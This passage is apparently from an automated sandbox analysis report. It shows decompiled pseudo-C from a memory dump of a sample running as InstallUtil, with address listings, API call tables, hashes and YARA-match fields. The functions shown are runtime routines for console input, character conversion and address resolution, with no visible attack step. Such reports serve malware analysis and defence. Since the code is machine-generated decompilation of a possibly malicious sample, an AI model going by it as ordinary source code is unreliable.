                                                                      									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                                                                      										goto L41;
                                                                      									}
                                                                      									_t180 = GetConsoleMode(_v32,  &_v44);
                                                                      									__eflags = _t180;
                                                                      									if(_t180 == 0) {
                                                                      										goto L41;
                                                                      									}
                                                                      									__eflags = _v5 - 2;
                                                                      									if(_v5 != 2) {
                                                                      										goto L42;
                                                                      									}
                                                                      									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                                                                      									__eflags = _t184;
                                                                      									if(_t184 != 0) {
                                                                      										_t229 = _a12;
                                                                      										_t242 = _t241 + _v36 * 2;
                                                                      										goto L45;
                                                                      									}
                                                                      									_t168 = GetLastError();
                                                                      									goto L37;
                                                                      								} else {
                                                                      									 *((intOrPtr*)(E00439941())) = 0xc;
                                                                      									 *(E0043992E()) = 8;
                                                                      									L38:
                                                                      									_t242 = _t241 | 0xffffffff;
                                                                      									__eflags = _t242;
                                                                      									L39:
                                                                      									E004427C2(_t246);
                                                                      									return _t242;
                                                                      								}
                                                                      							}
                                                                      							L15:
                                                                      							 *(E0043992E()) =  *_t206 & _t246;
                                                                      							 *((intOrPtr*)(E00439941())) = 0x16;
                                                                      							E0043862C();
                                                                      							goto L38;
                                                                      						}
                                                                      						__eflags = _t155 != 1;
                                                                      						if(_t155 != 1) {
                                                                      							L13:
                                                                      							_t163 = _a8;
                                                                      							_v16 = _t223;
                                                                      							_v12 = _t163;
                                                                      							goto L21;
                                                                      						}
                                                                      						_t211 =  !_t223;
                                                                      						__eflags = _t211 & 0x00000001;
                                                                      						if((_t211 & 0x00000001) == 0) {
                                                                      							goto L15;
                                                                      						}
                                                                      						goto L13;
                                                                      					}
                                                                      					L6:
                                                                      					 *(E0043992E()) =  *_t151 & 0x00000000;
                                                                      					 *((intOrPtr*)(E00439941())) = 0x16;
                                                                      					goto L59;
                                                                      				} else {
                                                                      					 *(E0043992E()) =  *_t212 & 0x00000000;
                                                                      					_t145 = E00439941();
                                                                      					 *_t145 = 9;
                                                                      					L60:
                                                                      					return _t145 | 0xffffffff;
                                                                      				}
                                                                      			}
                                                                      0x00448b44
                                                                      0x00448b47
                                                                      0x00448b4a
                                                                      0x00000000
                                                                      0x00448b4a
                                                                      0x00448b3e
                                                                      0x00448b40
                                                                      0x00448b42
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00448b42
                                                                      0x00448aee
                                                                      0x00448af3
                                                                      0x00448afb
                                                                      0x00000000
                                                                      0x00448a86
                                                                      0x00448a8b
                                                                      0x00448a8e
                                                                      0x00448a93
                                                                      0x00448e20
                                                                      0x00000000
                                                                      0x00448e20

                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41964ce1470a2d3a8d13c70f1d78a363870feb6cf36e7fd5b17cae898fe57565
                                                                      • Instruction ID: 52c02689ad14ce7649d6abddb2f94c6dec0276f26ec20c86b4e8b81c949368ea
                                                                      • Opcode Fuzzy Hash: 41964ce1470a2d3a8d13c70f1d78a363870feb6cf36e7fd5b17cae898fe57565
                                                                      • Instruction Fuzzy Hash: 63C106B4E043499FEB11DFA9C841BAEBBB0BF19314F14409EE450A7392CB789D41CB69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 83%
                                                                      			E0044FAF4(void* __ebx, void* __edi, void* __esi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, int _a20, char* _a24, int _a28, int _a32) {
                                                                      				signed int _v8;
                                                                      				char _v22;
                                                                      				struct _cpinfo _v28;
                                                                      				short* _v32;
                                                                      				int _v36;
                                                                      				char* _v40;
                                                                      				int _v44;
                                                                      				intOrPtr _v48;
                                                                      				void* _v60;
                                                                      				signed int _t63;
                                                                      				int _t70;
                                                                      				signed int _t72;
                                                                      				short* _t73;
                                                                      				signed int _t77;
                                                                      				short* _t87;
                                                                      				void* _t89;
                                                                      				void* _t92;
                                                                      				int _t99;
                                                                      				intOrPtr _t101;
                                                                      				intOrPtr _t102;
                                                                      				signed int _t112;
                                                                      				char* _t114;
                                                                      				char* _t115;
                                                                      				void* _t120;
                                                                      				void* _t121;
                                                                      				intOrPtr _t122;
                                                                      				intOrPtr _t123;
                                                                      				intOrPtr* _t125;
                                                                      				short* _t126;
                                                                      				int _t128;
                                                                      				int _t129;
                                                                      				short* _t130;
                                                                      				intOrPtr* _t131;
                                                                      				signed int _t132;
                                                                      				short* _t133;
                                                                      
                                                                      				_t63 =  *0x46c00c; // 0xe1ce05e9
                                                                      				_v8 = _t63 ^ _t132;
                                                                      				_t128 = _a20;
                                                                      				_v44 = _a4;
                                                                      				_v48 = _a8;
                                                                      				_t67 = _a24;
                                                                      				_v40 = _a24;
                                                                      				_t125 = _a16;
                                                                      				_v36 = _t125;
                                                                      				if(_t128 <= 0) {
                                                                      					if(_t128 >= 0xffffffff) {
                                                                      						goto L2;
                                                                      					} else {
                                                                      						goto L5;
                                                                      					}
                                                                      				} else {
                                                                      					_t128 = E004427A6(_t125, _t128);
                                                                      					_t67 = _v40;
                                                                      					L2:
                                                                      					_t99 = _a28;
                                                                      					if(_t99 <= 0) {
                                                                      						if(_t99 < 0xffffffff) {
                                                                      							goto L5;
                                                                      						} else {
                                                                      							goto L7;
                                                                      						}
                                                                      					} else {
                                                                      						_t99 = E004427A6(_t67, _t99);
                                                                      						L7:
                                                                      						_t70 = _a32;
                                                                      						if(_t70 == 0) {
                                                                      							_t70 =  *( *_v44 + 8);
                                                                      							_a32 = _t70;
                                                                      						}
                                                                      						if(_t128 == 0 || _t99 == 0) {
                                                                      							if(_t128 != _t99) {
                                                                      								if(_t99 <= 1) {
                                                                      									if(_t128 <= 1) {
                                                                      										if(GetCPInfo(_t70,  &_v28) == 0) {
                                                                      											goto L5;
                                                                      										} else {
                                                                      											if(_t128 <= 0) {
                                                                      												if(_t99 <= 0) {
                                                                      													goto L36;
                                                                      												} else {
                                                                      													_t89 = 2;
                                                                      													if(_v28 >= _t89) {
                                                                      														_t114 =  &_v22;
                                                                      														if(_v22 != 0) {
                                                                      															_t131 = _v40;
                                                                      															while(1) {
                                                                      																_t122 =  *((intOrPtr*)(_t114 + 1));
                                                                      																if(_t122 == 0) {
                                                                      																	goto L15;
                                                                      																}
                                                                      																_t101 =  *_t131;
                                                                      																if(_t101 <  *_t114 || _t101 > _t122) {
                                                                      																	_t114 = _t114 + _t89;
                                                                      																	if( *_t114 != 0) {
                                                                      																		continue;
                                                                      																	} else {
                                                                      																		goto L15;
                                                                      																	}
                                                                      																}
                                                                      																goto L63;
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      													goto L15;
                                                                      												}
                                                                      											} else {
                                                                      												_t92 = 2;
                                                                      												if(_v28 >= _t92) {
                                                                      													_t115 =  &_v22;
                                                                      													if(_v22 != 0) {
                                                                      														while(1) {
                                                                      															_t123 =  *((intOrPtr*)(_t115 + 1));
                                                                      															if(_t123 == 0) {
                                                                      																goto L17;
                                                                      															}
                                                                      															_t102 =  *_t125;
                                                                      															if(_t102 <  *_t115 || _t102 > _t123) {
                                                                      																_t115 = _t115 + _t92;
                                                                      																if( *_t115 != 0) {
                                                                      																	continue;
                                                                      																} else {
                                                                      																	goto L17;
                                                                      																}
                                                                      															}
                                                                      															goto L63;
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      												goto L17;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										L17:
                                                                      										_push(3);
                                                                      										goto L13;
                                                                      									}
                                                                      								} else {
                                                                      									L15:
                                                                      								}
                                                                      							} else {
                                                                      								_push(2);
                                                                      								L13:
                                                                      							}
                                                                      						} else {
                                                                      							L36:
                                                                      							_t126 = 0;
                                                                      							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t128, 0, 0);
                                                                      							_v44 = _t72;
                                                                      							if(_t72 == 0) {
                                                                      								L5:
                                                                      							} else {
                                                                      								_t120 = _t72 + _t72;
                                                                      								asm("sbb eax, eax");
                                                                      								if((_t120 + 0x00000008 & _t72) == 0) {
                                                                      									_t73 = 0;
                                                                      									_v32 = 0;
                                                                      									goto L45;
                                                                      								} else {
                                                                      									asm("sbb eax, eax");
                                                                      									_t85 = _t72 & _t120 + 0x00000008;
                                                                      									_t112 = _t120 + 8;
                                                                      									if((_t72 & _t120 + 0x00000008) > 0x400) {
                                                                      										asm("sbb eax, eax");
                                                                      										_t87 = E004421F7(_t112, _t85 & _t112);
                                                                      										_v32 = _t87;
                                                                      										if(_t87 == 0) {
                                                                      											goto L61;
                                                                      										} else {
                                                                      											 *_t87 = 0xdddd;
                                                                      											goto L43;
                                                                      										}
                                                                      									} else {
                                                                      										asm("sbb eax, eax");
                                                                      										E00452F00();
                                                                      										_t87 = _t133;
                                                                      										_v32 = _t87;
                                                                      										if(_t87 == 0) {
                                                                      											L61:
                                                                      											_t100 = _v32;
                                                                      										} else {
                                                                      											 *_t87 = 0xcccc;
                                                                      											L43:
                                                                      											_t73 =  &(_t87[4]);
                                                                      											_v32 = _t73;
                                                                      											L45:
                                                                      											if(_t73 == 0) {
                                                                      												goto L61;
                                                                      											} else {
                                                                      												_t129 = _a32;
                                                                      												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
                                                                      													goto L61;
                                                                      												} else {
                                                                      													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
                                                                      													_v36 = _t77;
                                                                      													if(_t77 == 0) {
                                                                      														goto L61;
                                                                      													} else {
                                                                      														_t121 = _t77 + _t77;
                                                                      														_t108 = _t121 + 8;
                                                                      														asm("sbb eax, eax");
                                                                      														if((_t121 + 0x00000008 & _t77) == 0) {
                                                                      															_t130 = _t126;
                                                                      															goto L56;
                                                                      														} else {
                                                                      															asm("sbb eax, eax");
                                                                      															_t81 = _t77 & _t121 + 0x00000008;
                                                                      															_t108 = _t121 + 8;
                                                                      															if((_t77 & _t121 + 0x00000008) > 0x400) {
                                                                      																asm("sbb eax, eax");
                                                                      																_t130 = E004421F7(_t108, _t81 & _t108);
                                                                      																_pop(_t108);
                                                                      																if(_t130 == 0) {
                                                                      																	goto L59;
                                                                      																} else {
                                                                      																	 *_t130 = 0xdddd;
                                                                      																	goto L54;
                                                                      																}
                                                                      															} else {
                                                                      																asm("sbb eax, eax");
                                                                      																E00452F00();
                                                                      																_t130 = _t133;
                                                                      																if(_t130 == 0) {
                                                                      																	L59:
                                                                      																	_t100 = _v32;
                                                                      																} else {
                                                                      																	 *_t130 = 0xcccc;
                                                                      																	L54:
                                                                      																	_t130 =  &(_t130[4]);
                                                                      																	L56:
                                                                      																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
                                                                      																		goto L59;
                                                                      																	} else {
                                                                      																		_t100 = _v32;
                                                                      																		_t126 = E0044466F(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      														E00432753(_t130);
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      								E00432753(_t100);
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L63:
                                                                      				return E004318FB(_v8 ^ _t132);
                                                                      			}
                                                                      0x0044fafc
                                                                      0x0044fb03
                                                                      0x0044fb0b
                                                                      0x0044fb0e
                                                                      0x0044fb14
                                                                      0x0044fb17
                                                                      0x0044fb1a
                                                                      0x0044fb1e
                                                                      0x0044fb21
                                                                      0x0044fb26
                                                                      0x0044fb4d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044fb28
                                                                      0x0044fb30
                                                                      0x0044fb32
                                                                      0x0044fb36
                                                                      0x0044fb36
                                                                      0x0044fb3b
                                                                      0x0044fb59
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044fb3d
                                                                      0x0044fb46
                                                                      0x0044fb5b
                                                                      0x0044fb5b
                                                                      0x0044fb60
                                                                      0x0044fb67
                                                                      0x0044fb6a
                                                                      0x0044fb6a
                                                                      0x0044fb6f
                                                                      0x0044fb7b
                                                                      0x0044fb88
                                                                      0x0044fb95
                                                                      0x0044fba8
                                                                      0x00000000
                                                                      0x0044fbaa
                                                                      0x0044fbac
                                                                      0x0044fbdf
                                                                      0x00000000
                                                                      0x0044fbe1
                                                                      0x0044fbe3
                                                                      0x0044fbe7
                                                                      0x0044fbed
                                                                      0x0044fbf0
                                                                      0x0044fbf2
                                                                      0x0044fbf5
                                                                      0x0044fbf5
                                                                      0x0044fbfa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044fbfc
                                                                      0x0044fc00
                                                                      0x0044fc0a
                                                                      0x0044fc0f
                                                                      0x00000000
                                                                      0x0044fc11
                                                                      0x00000000
                                                                      0x0044fc11
                                                                      0x0044fc0f
                                                                      0x00000000
                                                                      0x0044fc00
                                                                      0x0044fbf5
                                                                      0x0044fbf0
                                                                      0x00000000
                                                                      0x0044fbe7
                                                                      0x0044fbae
                                                                      0x0044fbb0
                                                                      0x0044fbb4
                                                                      0x0044fbba
                                                                      0x0044fbbd
                                                                      0x0044fbbf
                                                                      0x0044fbbf
                                                                      0x0044fbc4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0044fbc6
                                                                      0x0044fbca
                                                                      0x0044fbd4
                                                                      0x0044fbd9
                                                                      0x00000000
                                                                      0x0044fbdb
                                                                      0x00000000
                                                                      0x0044fbdb
                                                                      0x0044fbd9
                                                                      0x00000000
                                                                      0x0044fbca
                                                                      0x0044fbbf
                                                                      0x0044fbbd
                                                                      0x00000000
                                                                      0x0044fbb4
                                                                      0x0044fbac
                                                                      0x0044fb97
                                                                      0x0044fb97
                                                                      0x0044fb97
                                                                      0x00000000
                                                                      0x0044fb97
                                                                      0x0044fb8a
                                                                      0x0044fb8a
                                                                      0x0044fb8c
                                                                      0x0044fb7d
                                                                      0x0044fb7d
                                                                      0x0044fb7f
                                                                      0x0044fb7f
                                                                      0x0044fc16
                                                                      0x0044fc16
                                                                      0x0044fc16
                                                                      0x0044fc23
                                                                      0x0044fc29
                                                                      0x0044fc2e
                                                                      0x0044fb4f
                                                                      0x0044fc34
                                                                      0x0044fc34
                                                                      0x0044fc3c
                                                                      0x0044fc40
                                                                      0x0044fc9b
                                                                      0x0044fc9d
                                                                      0x00000000
                                                                      0x0044fc42
                                                                      0x0044fc47
                                                                      0x0044fc49
                                                                      0x0044fc4b
                                                                      0x0044fc53
                                                                      0x0044fc77
                                                                      0x0044fc7c
                                                                      0x0044fc81
                                                                      0x0044fc87
                                                                      0x00000000
                                                                      0x0044fc8d
                                                                      0x0044fc8d
                                                                      0x00000000
                                                                      0x0044fc8d
                                                                      0x0044fc55
                                                                      0x0044fc57
                                                                      0x0044fc5b
                                                                      0x0044fc60
                                                                      0x0044fc62
                                                                      0x0044fc67
                                                                      0x0044fd7c
                                                                      0x0044fd7c
                                                                      0x0044fc6d
                                                                      0x0044fc6d
                                                                      0x0044fc93
                                                                      0x0044fc93
                                                                      0x0044fc96
                                                                      0x0044fca0
                                                                      0x0044fca2
                                                                      0x00000000
                                                                      0x0044fca8
                                                                      0x0044fcb0
                                                                      0x0044fcbe
                                                                      0x00000000
                                                                      0x0044fcc4
                                                                      0x0044fccd
                                                                      0x0044fcd3
                                                                      0x0044fcd8
                                                                      0x00000000
                                                                      0x0044fcde
                                                                      0x0044fcde
                                                                      0x0044fce1
                                                                      0x0044fce6
                                                                      0x0044fcea
                                                                      0x0044fd36
                                                                      0x00000000
                                                                      0x0044fcec
                                                                      0x0044fcf1
                                                                      0x0044fcf3
                                                                      0x0044fcf5
                                                                      0x0044fcfd
                                                                      0x0044fd1a
                                                                      0x0044fd24
                                                                      0x0044fd26
                                                                      0x0044fd29
                                                                      0x00000000
                                                                      0x0044fd2b
                                                                      0x0044fd2b
                                                                      0x00000000
                                                                      0x0044fd2b
                                                                      0x0044fcff
                                                                      0x0044fd01
                                                                      0x0044fd05
                                                                      0x0044fd0a
                                                                      0x0044fd0e
                                                                      0x0044fd70
                                                                      0x0044fd70
                                                                      0x0044fd10
                                                                      0x0044fd10
                                                                      0x0044fd31
                                                                      0x0044fd31
                                                                      0x0044fd38
                                                                      0x0044fd3a
                                                                      0x00000000
                                                                      0x0044fd53
                                                                      0x0044fd53
                                                                      0x0044fd6c
                                                                      0x0044fd6c
                                                                      0x0044fd3a
                                                                      0x0044fd0e
                                                                      0x0044fcfd
                                                                      0x0044fd74
                                                                      0x0044fd79
                                                                      0x0044fcd8
                                                                      0x0044fcbe
                                                                      0x0044fca2
                                                                      0x0044fc67
                                                                      0x0044fc53
                                                                      0x0044fd80
                                                                      0x0044fd86
                                                                      0x0044fc2e
                                                                      0x0044fb6f
                                                                      0x0044fb3b
                                                                      0x0044fd88
                                                                      0x0044fd9b

                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044FDCD,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044FBA0
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044FDCD,00000000,00000000,?,00000001,?,?,?,?), ref: 0044FC23
                                                                      • __alloca_probe_16.LIBCMT ref: 0044FC5B
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044FDCD,?,0044FDCD,00000000,00000000,?,00000001,?,?,?,?), ref: 0044FCB6
                                                                      • __alloca_probe_16.LIBCMT ref: 0044FD05
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044FDCD,00000000,00000000,?,00000001,?,?,?,?), ref: 0044FCCD
                                                                        • Part of subcall function 004421F7: RtlAllocateHeap.NTDLL(00000000,00431BAF,?,?,00435157,?,?,?,?,?,0040B882,00431BAF,?,?,?,?), ref: 00442229
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044FDCD,00000000,00000000,?,00000001,?,?,?,?), ref: 0044FD49
                                                                      • __freea.LIBCMT ref: 0044FD74
                                                                      • __freea.LIBCMT ref: 0044FD80
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                      • String ID:
                                                                      • API String ID: 201697637-0
                                                                      • Opcode ID: 46d9acc365897a445313a6b8e0c3c4e6d771333686758fe8883d7c6313b8f423
                                                                      • Instruction ID: aeb5f0c32eeed422b84e7d2e18918e31ff4b46808557f580d2f1ef4b3bcc4035
                                                                      • Opcode Fuzzy Hash: 46d9acc365897a445313a6b8e0c3c4e6d771333686758fe8883d7c6313b8f423
                                                                      • Instruction Fuzzy Hash: A8910471E006469AEB208E64CC91EEFBBB5EF49354F14417AE801EB281D72CDC49C7A9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 45%
                                                                      			E00411EE3(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                                                                      				intOrPtr _v0;
                                                                      				char _v4;
                                                                      				signed int _v8;
                                                                      				signed short _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed short _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v48;
                                                                      				signed int _t70;
                                                                      				signed short _t81;
                                                                      				signed int _t82;
                                                                      				signed short _t85;
                                                                      				signed short _t86;
                                                                      				void* _t88;
                                                                      				signed int _t97;
                                                                      				signed char _t99;
                                                                      				void* _t100;
                                                                      				signed int _t107;
                                                                      				signed short _t108;
                                                                      				signed int _t110;
                                                                      				signed int _t116;
                                                                      				signed int* _t118;
                                                                      				signed int _t119;
                                                                      				signed int _t120;
                                                                      				intOrPtr _t121;
                                                                      
                                                                      				_t110 = _a8;
                                                                      				_t99 = 0;
                                                                      				_t120 = _a4;
                                                                      				_t97 = 0;
                                                                      				_v28 = 0;
                                                                      				_v16 = 0;
                                                                      				_v32 = 0;
                                                                      				_v4 = 0;
                                                                      				_v12 = 0;
                                                                      				_v24 = 0;
                                                                      				_v8 = 0;
                                                                      				_v20 = 0;
                                                                      				_t119 = 0;
                                                                      				_t118 = _a16;
                                                                      				 *_t118 = 0;
                                                                      				if(_t120 != 0 || _t110 != 0) {
                                                                      					_t70 = _a12;
                                                                      					__eflags = _t70;
                                                                      					if(_t70 == 0) {
                                                                      						L20:
                                                                      						_a16 = _t97;
                                                                      						__eflags = _t110;
                                                                      						if(_t110 == 0) {
                                                                      							L40:
                                                                      							__eflags = _t120;
                                                                      							if(_t120 == 0) {
                                                                      								__eflags = _v28 & 0x00000001;
                                                                      								_t100 = 0;
                                                                      								_t72 =  !=  ? _t100 : 0x7f000001;
                                                                      								__imp__#8(0x7f000001);
                                                                      								_t121 =  !=  ? _t100 : 0x7f000001;
                                                                      								L47:
                                                                      								_t73 = E00411C46(_t97, _v20, __eflags, _v36, _t121);
                                                                      								 *_t118 = _t73;
                                                                      								__eflags = _t73;
                                                                      								if(_t73 != 0) {
                                                                      									__eflags = _v0 - _t119;
                                                                      									if(_v0 == _t119) {
                                                                      										L54:
                                                                      										__eflags = _v28;
                                                                      										if(_v28 == 0) {
                                                                      											L57:
                                                                      											return _t119;
                                                                      										}
                                                                      										_t119 = E00411E6A(_v24,  *_t118);
                                                                      										__eflags = _t119;
                                                                      										if(_t119 == 0) {
                                                                      											goto L57;
                                                                      										}
                                                                      										L56:
                                                                      										E00411EA8(_t73,  *_t118);
                                                                      										 *_t118 =  *_t118 & 0x00000000;
                                                                      										__eflags =  *_t118;
                                                                      										goto L57;
                                                                      									}
                                                                      									 *_t73 =  *_t73 | 0x00000004;
                                                                      									__eflags = _v32 & 0x00000002;
                                                                      									if((_v32 & 0x00000002) == 0) {
                                                                      										goto L54;
                                                                      									}
                                                                      									__imp__#12(_t121);
                                                                      									 *((intOrPtr*)( *_t118 + 0x14)) = E00411BC8(_t73);
                                                                      									_t73 =  *_t118;
                                                                      									__eflags =  *((intOrPtr*)(_t73 + 0x14)) - _t119;
                                                                      									if( *((intOrPtr*)(_t73 + 0x14)) != _t119) {
                                                                      										goto L54;
                                                                      									}
                                                                      									_t119 = 8;
                                                                      									L53:
                                                                      									__eflags = _t119;
                                                                      									if(_t119 != 0) {
                                                                      										goto L56;
                                                                      									}
                                                                      									goto L54;
                                                                      								}
                                                                      								_t119 = 8;
                                                                      								goto L56;
                                                                      							}
                                                                      							__eflags = E00411C00(_t120,  &_v4);
                                                                      							if(__eflags != 0) {
                                                                      								_t121 = _v4;
                                                                      								goto L47;
                                                                      							}
                                                                      							_t73 = _v28;
                                                                      							__eflags = _t73 & 0x00000004;
                                                                      							if((_t73 & 0x00000004) == 0) {
                                                                      								_push(_t118);
                                                                      								_push(_t73 & 0x00000002);
                                                                      								_push(_v32);
                                                                      								_push(_v16);
                                                                      								_t119 = E00411D5F(_t120, _t97);
                                                                      								goto L53;
                                                                      							}
                                                                      							_t119 = 0x2af9;
                                                                      							goto L56;
                                                                      						}
                                                                      						_t107 = E00438A88(_t99, _t110,  &_v12, 0xa) & 0x0000ffff;
                                                                      						_t81 = _v12;
                                                                      						_v32 = _t107;
                                                                      						__eflags =  *_t81;
                                                                      						if( *_t81 != 0) {
                                                                      							__eflags = _t97;
                                                                      							if(_t97 == 0) {
                                                                      								L26:
                                                                      								__imp__#55(_a8, "udp");
                                                                      								__eflags = _t81;
                                                                      								if(_t81 != 0) {
                                                                      									_t85 =  *(_t81 + 8) & 0x0000ffff;
                                                                      									_v28 = _t85;
                                                                      									_t81 = _t85 & 0x0000ffff;
                                                                      									_v40 = _t81;
                                                                      								}
                                                                      								L28:
                                                                      								__eflags = _t97;
                                                                      								if(_t97 == 0) {
                                                                      									L30:
                                                                      									__imp__#55(_v0, "tcp");
                                                                      									_t116 = 1;
                                                                      									__eflags = _t81;
                                                                      									if(_t81 == 0) {
                                                                      										L32:
                                                                      										_t108 = _v24;
                                                                      										_t82 = _v48;
                                                                      										L33:
                                                                      										__eflags = _t82;
                                                                      										if(_t82 != 0) {
                                                                      											__eflags = _t97;
                                                                      											if(_t97 != 0) {
                                                                      												goto L40;
                                                                      											}
                                                                      											__eflags = _t108;
                                                                      											_t97 = (_t97 & 0xffffff00 | _t108 == 0x00000000) + 1;
                                                                      											__eflags = _t108;
                                                                      											if(_t108 == 0) {
                                                                      												L39:
                                                                      												_t48 =  &_v40;
                                                                      												 *_t48 = _v40 & _t119;
                                                                      												__eflags =  *_t48;
                                                                      												goto L40;
                                                                      											}
                                                                      											__eflags = _v36 - _t119;
                                                                      											if(_v36 == _t119) {
                                                                      												goto L39;
                                                                      											}
                                                                      											_v40 = _t116;
                                                                      											goto L40;
                                                                      										}
                                                                      										__eflags = _t97;
                                                                      										_t84 =  !=  ? 0x277d : 0x2af9;
                                                                      										return  !=  ? 0x277d : 0x2af9;
                                                                      									}
                                                                      									_t108 =  *(_t81 + 8) & 0x0000ffff;
                                                                      									_t82 = _t108 & 0x0000ffff;
                                                                      									_v48 = _t82;
                                                                      									goto L33;
                                                                      								}
                                                                      								_t116 = 1;
                                                                      								__eflags = _t97 - 1;
                                                                      								if(_t97 != 1) {
                                                                      									goto L32;
                                                                      								}
                                                                      								goto L30;
                                                                      							}
                                                                      							__eflags = _t97 - 2;
                                                                      							if(_t97 != 2) {
                                                                      								goto L28;
                                                                      							}
                                                                      							goto L26;
                                                                      						}
                                                                      						__imp__#9(_t107);
                                                                      						_t86 = _t81 & 0x0000ffff;
                                                                      						__eflags = _t97;
                                                                      						_v24 = _t86;
                                                                      						_v36 = _t86 & 0x0000ffff;
                                                                      						_t88 = 1;
                                                                      						_t97 =  ==  ? _t88 : _t97;
                                                                      						__eflags = _a12;
                                                                      						_v28 = 0 | _a12 == 0x00000000;
                                                                      						goto L40;
                                                                      					}
                                                                      					__eflags =  *((intOrPtr*)(_t70 + 0x10)) - _t99;
                                                                      					if( *((intOrPtr*)(_t70 + 0x10)) != _t99) {
                                                                      						L23:
                                                                      						return 0x2afb;
                                                                      					}
                                                                      					__eflags =  *((intOrPtr*)(_t70 + 0x14)) - _t99;
                                                                      					if( *((intOrPtr*)(_t70 + 0x14)) != _t99) {
                                                                      						goto L23;
                                                                      					}
                                                                      					__eflags =  *((intOrPtr*)(_t70 + 0x18)) - _t99;
                                                                      					if( *((intOrPtr*)(_t70 + 0x18)) != _t99) {
                                                                      						goto L23;
                                                                      					}
                                                                      					__eflags =  *((intOrPtr*)(_t70 + 0x1c)) - _t99;
                                                                      					if( *((intOrPtr*)(_t70 + 0x1c)) != _t99) {
                                                                      						goto L23;
                                                                      					}
                                                                      					_t99 =  *_t70;
                                                                      					_v28 = _t99;
                                                                      					__eflags = _t99 & 0x00000002;
                                                                      					if((_t99 & 0x00000002) == 0) {
                                                                      						L11:
                                                                      						__eflags =  *((intOrPtr*)(_t70 + 4)) - _t97;
                                                                      						if( *((intOrPtr*)(_t70 + 4)) == _t97) {
                                                                      							L14:
                                                                      							_t97 =  *(_t70 + 8);
                                                                      							__eflags = _t97;
                                                                      							if(_t97 == 0) {
                                                                      								L19:
                                                                      								_v16 =  *((intOrPtr*)(_t70 + 0xc));
                                                                      								goto L20;
                                                                      							}
                                                                      							__eflags = _t97 - 1;
                                                                      							if(_t97 == 1) {
                                                                      								goto L19;
                                                                      							}
                                                                      							__eflags = _t97 - 2;
                                                                      							if(_t97 == 2) {
                                                                      								goto L19;
                                                                      							}
                                                                      							__eflags = _t97 - 3;
                                                                      							if(_t97 == 3) {
                                                                      								goto L19;
                                                                      							}
                                                                      							return 0x273c;
                                                                      						}
                                                                      						__eflags =  *((intOrPtr*)(_t70 + 4)) - 2;
                                                                      						if( *((intOrPtr*)(_t70 + 4)) == 2) {
                                                                      							goto L14;
                                                                      						}
                                                                      						return 0x273f;
                                                                      					}
                                                                      					__eflags = _t120;
                                                                      					if(_t120 != 0) {
                                                                      						goto L11;
                                                                      					}
                                                                      					return 0x2726;
                                                                      				} else {
                                                                      					return 0x2af9;
                                                                      				}
                                                                      			}

                                                                      0x00411ee6
                                                                      0x00411eea
                                                                      0x00411eee
                                                                      0x00411ef2
                                                                      0x00411ef4
                                                                      0x00411ef8
                                                                      0x00411efc
                                                                      0x00411f00
                                                                      0x00411f04
                                                                      0x00411f08
                                                                      0x00411f0c
                                                                      0x00411f10
                                                                      0x00411f15
                                                                      0x00411f18
                                                                      0x00411f1c
                                                                      0x00411f20
                                                                      0x00411f30
                                                                      0x00411f34
                                                                      0x00411f36
                                                                      0x00411fb1
                                                                      0x00411fb1
                                                                      0x00411fb5
                                                                      0x00411fb7
                                                                      0x004120b1
                                                                      0x004120b1
                                                                      0x004120b3
                                                                      0x004120f6
                                                                      0x00412102
                                                                      0x00412103
                                                                      0x00412107
                                                                      0x0041210d
                                                                      0x0041210f
                                                                      0x0041211a
                                                                      0x0041211f
                                                                      0x00412121
                                                                      0x00412123
